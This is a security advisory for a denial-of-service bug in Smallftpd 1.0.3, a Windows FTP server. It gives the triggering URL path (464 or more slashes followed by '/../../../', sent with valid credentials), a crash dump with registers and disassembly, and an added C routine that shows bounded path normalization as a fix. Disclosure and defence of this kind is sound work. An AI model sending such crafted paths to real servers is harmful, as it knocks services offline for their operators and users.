Smallftpd 1.0.3 DoS
Application: Smallftpd
http://smallftpd.free.fr/
Version: 1.0.3
Bug: Denial Of Service
Author: intuit
e-mail: intuit@xxxxxxxxxxxxx
web: http://rootshells.tk/
greetz to: tgs ;)))
***********************************************************************
1. Description
2. The bug
3. The code
4. The fix
***********************************************************************
^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^
Vendor's Description:
"Small ftpd is a small and simple multi-threaded ftp server for Windows."
***********************************************************************
^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^
Sending a request with a path like the one below several times (usually two suffice):
-----------------------------------------------------------------------
ftp://user:pass@xxxxxxxxx/[464 and more "/" symbols]/../../../
-----------------------------------------------------------------------
crashes smallftpd.exe.
The user:pass credentials must be valid.
***********************************************************************
^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^
The fault occurs here:
-----------------------------------------------------------------------
AppName: smallftpd.exe AppVer: 0.0.0.0 ModName: user32.dll
ModVer: 5.1.2600.0 Offset: 0000ca84
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Registers:
EAX=56534150 EBX=0000000A ECX=56534150 EDX=00000000
ESI=56534151 EDI=0136F8FA EIP=77D4CA84 ESP=0136F85C
EBP=0136F894 EFL=00000206
CS=001B DS=0023 ES=0023 SS=0023
FS=0038 GS=0000 OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=1 CY=0
56534150 = ??
Code(Win XP Build 2600, Service Pack: None):
77D4C9F6 mov ecx,dword ptr [esp+8]
77D4C9FA mov eax,dword ptr [esp+4]
77D4C9FE cmp ecx,eax
77D4CA00 jbe 77D4CA12
77D4CA02 push ebx
77D4CA03 mov bl,byte ptr [ecx]
77D4CA05 mov dl,byte ptr [eax]
77D4CA07 mov byte ptr [eax],bl
77D4CA09 inc eax
77D4CA0A mov byte ptr [ecx],dl
77D4CA0C dec ecx
77D4CA0D cmp ecx,eax
77D4CA0F ja 77D4CA03
77D4CA11 pop ebx
77D4CA12 ret 8
77D4CA15 sub ecx,69h
77D4CA18 je 77D4C85C
77D4CA1E sub ecx,7
77D4CA21 je 77D77FAF
77D4CA27 sub ecx,3
77D4CA2A je 77D4CAF5
77D4CA30 dec ecx
77D4CA31 dec ecx
77D4CA32 je 77D4C863
77D4CA38 sub ecx,3
77D4CA3B jne 77D4C97D
77D4CA41 cmp byte ptr [ebp+0Bh],0
77D4CA45 push 10h
77D4CA47 pop ebx
77D4CA48 je 77D4C867
77D4CA4E cmp dword ptr [ebp-20h],0
77D4CA52 sete al
77D4CA55 dec al
77D4CA57 and al,0E0h
77D4CA59 add al,78h
77D4CA5B mov byte ptr [ebp+0Bh],al
77D4CA5E jmp 77D4C867
77D4CA63 cmp dword ptr [ebp-14h],eax
77D4CA66 jne 77D7ED06
77D4CA6C mov ecx,dword ptr [ebp-0Ch]
77D4CA6F mov ecx,dword ptr [ecx-4]
77D4CA72 mov dword ptr [ebp-2Ch],ecx
77D4CA75 mov dword ptr [ebp-28h],eax
77D4CA78 jmp 77D4C89D
77D4CA7D add ecx,esi
77D4CA7F jmp 77D4C9D5
77D4CA84 mov dl,byte ptr [eax] <<< ftp server crashing here
77D4CA86 inc eax
77D4CA87 test dl,dl
77D4CA89 jne 77D4CA84
77D4CA8B sub eax,esi
77D4CA8D xor esi,esi
77D4CA8F xor edx,edx
77D4CA91 cmp dword ptr [ebp-10h],edx
77D4CA94 jge 77D7A796
77D4CA9A sub dword ptr [ebp-8],eax
77D4CA9D cmp esi,edx
77D4CA9F jne 77D6FF80
-----------------------------------------------------------------------
/* Tested on: Win XP Build 2600, Service Pack: None
              Win XP Build 2600, Service Pack: SP1
              Win 98 Second Edition */
***********************************************************************
^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^
None exists.
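No vendor fix was available when this advisory was written. As an added example that is not part of the advisory and not Smallftpd's own code, the C routine below shows the kind of bounded path normalization an FTP server can apply to a client-supplied path before using it: runs of "/" collapse to one separator, ".." never climbs above the virtual root, and every copy into the output buffer is length-checked. The limits MAX_PATH_IN, MAX_DEPTH and MAX_SEG_LEN are constructed for this example; demo_slash_flood() builds the advisory-style input (464 slashes followed by "/../../../") to show that it normalizes to "/" without any unbounded work.

```c
#include <stdio.h>
#include <string.h>

/* Constructed limits for this example; they are not Smallftpd's own values. */
#define MAX_PATH_IN  1024  /* longest client-supplied path accepted, in bytes */
#define MAX_DEPTH    64    /* maximum number of retained path components */
#define MAX_SEG_LEN  255   /* longest single component */

/*
 * Normalize a client-supplied FTP path into a fixed-size buffer.
 * Runs of '/' collapse to one separator, "." is dropped, ".." pops one
 * component but never climbs above the virtual root "/", and every copy
 * into `out` is bounds-checked. Returns 0 on success (out is NUL-terminated)
 * or -1 when the input is too long, too deep, or would not fit in `out`.
 */
int normalize_ftp_path(const char *in, char *out, size_t outsz)
{
    /* Bounded length scan: refuse oversized input before doing anything else. */
    size_t inlen = 0;
    while (in[inlen] != '\0') {
        if (++inlen > MAX_PATH_IN)
            return -1;
    }

    const char *seg[MAX_DEPTH];
    size_t seglen[MAX_DEPTH];
    size_t depth = 0;

    for (const char *p = in; *p != '\0'; ) {
        while (*p == '/')             /* a run of slashes costs a counter, not memory */
            p++;
        if (*p == '\0')
            break;
        const char *start = p;
        while (*p != '\0' && *p != '/')
            p++;
        size_t len = (size_t)(p - start);

        if (len > MAX_SEG_LEN)
            return -1;
        if (len == 1 && start[0] == '.')
            continue;                 /* "." is a no-op */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth > 0)
                depth--;              /* ".." at the root stays at the root */
            continue;
        }
        if (depth == MAX_DEPTH)
            return -1;
        seg[depth] = start;
        seglen[depth] = len;
        depth++;
    }

    /* Emit "/" followed by the retained components, checking space each time. */
    if (outsz < 2)
        return -1;
    size_t used = 0;
    out[used++] = '/';
    for (size_t i = 0; i < depth; i++) {
        if (i > 0) {
            if (used + 1 >= outsz)
                return -1;
            out[used++] = '/';
        }
        if (used + seglen[i] >= outsz)
            return -1;
        memcpy(out + used, seg[i], seglen[i]);
        used += seglen[i];
    }
    out[used] = '\0';
    return 0;
}

/*
 * Build the advisory-style input (464 slashes followed by "/../../../") and
 * normalize it. Returns 1 when the result is the virtual root "/", else 0.
 */
int demo_slash_flood(void)
{
    char in[512];   /* constructed sample input, well within MAX_PATH_IN */
    char out[64];
    memset(in, '/', 464);
    in[464] = '\0';
    strcat(in, "/../../../");
    return normalize_ftp_path(in, out, sizeof out) == 0 && strcmp(out, "/") == 0;
}

int main(void)
{
    char out[64];
    const char *samples[] = { "/pub/./a/../b//c", "/../../..", "pub/../../x" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = normalize_ftp_path(samples[i], out, sizeof out);
        printf("%-20s -> %s\n", samples[i], rc == 0 ? out : "rejected");
    }
    printf("slash flood handled: %s\n", demo_slash_flood() ? "yes" : "no");
    return 0;
}
```

The design point is that the input is rejected by length before any further processing, the number of retained components is capped, and the output buffer size is passed explicitly and honoured, so a long or deeply nested path can only produce "rejected", never an out-of-bounds read or write.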
***********************************************************************